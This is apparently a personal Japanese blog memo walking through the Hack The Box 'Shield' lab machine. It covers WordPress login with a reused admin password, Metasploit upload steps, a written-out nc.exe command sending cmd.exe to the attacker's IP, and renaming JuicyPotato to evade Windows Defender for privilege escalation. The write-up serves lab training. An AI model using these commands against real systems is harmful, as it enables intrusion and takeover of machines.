ただのメモです

Writeupなら他のブログ見たほうがいいと思います.

Shield -Starting Point- Writeup

 まずnmapから

f:id:F-Ryu:20210606170957p:plain

 httpとmysqlサーバーが稼働しています。まずサイトにアクセスすると

f:id:F-Ryu:20210606171044p:plain

 windows公式のサイトでしょうか。試しにwelcomeを押しても別の公式サイトに飛ばされます。gobusterを使って調べてみましょう。

f:id:F-Ryu:20210606171159p:plain

 wordpressがあるようです。アクセスしてみると

f:id:F-Ryu:20210606171256p:plain

 自動車?のブログのようです。サイトを見てみるとblogのページがあり、さらにloginページが見つかります。

f:id:F-Ryu:20210607105424p:plain

ここで今までのboxで手に入れたパスワードを使ってみるとadmin:P@s5w0rd!でログインすることができました。

f:id:F-Ryu:20210607105444p:plain

 ユーザーネームとパスワードが揃ったのでmetasploitでリバースシェルを得ることができます。msfconsoleを起動しwordpress admin shellで検索して、use 0で使います。

f:id:F-Ryu:20210607105629p:plain

 以下のように設定(それぞれsetで設定しましょう)

f:id:F-Ryu:20210607105725p:plain

f:id:F-Ryu:20210607105803p:plain

成功しました!対象がwindowsなのでリバースシェルを得るためにnc.exeをアップロードします。https://github.com/int0x33/nc.exe からダウンロードし解凍、nc.exeをダウンロードフォルダに入れます。

 次にmsfconsoleでnc.exeがあるフォルダを設定しターゲットにアップロードします。その後ターゲットでnc.exeを起動します。別ターミナルでncしておくのを忘れないようにしましょう(なおポートはnc.exeのデフォルト)。これでリバースシェルが得られます。

 lcd /home/ユーザー/Downloads

 cd C:/inetpub/wwwroot/wordpress/wp-content/uploads

 upload nc.exe

 execute -f nc.exe - "-e cmd.exe <自分のIP> 1234"

f:id:F-Ryu:20210607110014p:plain

 次に特権昇格を狙いましょう。msfconsoleでsysinfoすると

f:id:F-Ryu:20210607110549p:plain

 どうやら古いバージョンを使用しているようです。これをもとにexploitを探すとjuicy_potato(https://github.com/ohpe/juicy-potato/releases)というものが見つかります。これを使用しましょう。githubからダウンロードし名前を変更します(ターゲットのwindows defenderではじかれるため)。先ほどのnc.exe同様にアップロードして

f:id:F-Ryu:20210607110944p:plain

 ターゲットでリバースシェル用のスクリプトを作成。

f:id:F-Ryu:20210607111006p:plain

 f:id:F-Ryu:20210607111112p:plain

 さらに別ターミナルでポート1111(juicypotatoのデフォルト)を開きターゲットでjuicypotatoを起動します。すると

f:id:F-Ryu:20210607111247p:plain

root権限が得られました!デスクトップからroot.txtを入手できます。

 

 

ブログを作成するにあたり公式walkthroughと下記サイトを参考にしました。

github.com